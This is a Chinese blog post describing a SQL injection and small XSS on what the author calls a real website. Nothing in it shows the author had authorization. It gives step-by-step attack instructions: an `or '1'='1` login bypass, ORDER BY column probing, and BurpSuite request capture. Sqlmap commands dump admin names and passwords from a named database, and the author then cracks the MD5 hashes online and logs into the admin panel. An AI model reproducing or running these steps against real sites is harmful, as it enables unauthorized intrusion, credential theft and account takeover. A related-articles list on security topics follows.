真实sql注入以及小xss--BurpSuite联动sqlmap篇

前几天漏洞检测的时候无意发现一个sql注入

首先我先去网站的robots.txt去看了看无意间发现很多资产

而我意外发现admin就是后台

之后我通过基础的万能账号密码测试or '1'='1也根本没有效果

而当我注入列的时候情况出现了

出现了报错,有报错必有注入点

因此我尝试了注入,在order by 1和order by 2的时候是没有报错的,而3就有了证明一件事情,表格是两列,咱们暂且确定他是user列和password当然是我猜的

那既然这样直接开启BurpSuite去进行抓包

很明显我输入的已经到里面了,我们现在尝试更改命令为查询语句

好了版本信息出来了SQL Server 2008 10.50.1600.1

那我们继续去查用户一般来说公司内部都是user

很明显用户的名称出现了

那就ok了,我们直接去sqlmap爆破即可,这里提示一个小点,BurpSuite联合sqlmap使用,将数据包导出来然后导入sqlmap目录下使用

sqlmap -r 1.txt -p username --dbs

数据库

查表

复制代码
​
sqlmap -r 3.txt -p username -D qds131170580_db -T Admin_infor --columns

之后查询表中数据列名

复制代码
sqlmap -r 3.txt -p username -D qds131170580_db -T Admin_infor --dump -C "Name,Pwd"

查看name和passowrd,爆数据了

成功解密

解密MD5好用的网站:MD5免费在线解密破解_MD5在线加密-SOMD5

成功进入

xss在搜索上面进入<a>标签

实现

相关推荐
黑客老陈9 分钟前
新手小白如何挖掘cnvd通用漏洞之存储xss漏洞(利用xss钓鱼)
运维·服务器·前端·网络·安全·web3·xss
无泡汽水3 小时前
漏洞检测工具:Swagger UI敏感信息泄露
python·web安全
代码改变世界ctw6 小时前
如何学习Trustzone
安全·trustzone·atf·optee·tee·armv8·armv9
WTT00119 小时前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
群联云防护小杜12 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai12 小时前
HTTP协议及安全防范
网络协议·安全·http
黑客Jack13 小时前
防御 XSS 的七条原则
安全·web安全·xss
东方隐侠安全团队-千里13 小时前
网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
网络·chrome·web安全
云云32113 小时前
怎么通过亚矩阵云手机实现营销?
大数据·服务器·安全·智能手机·矩阵
神一样的老师14 小时前
面向高精度网络的时间同步安全管理架构
网络·安全·架构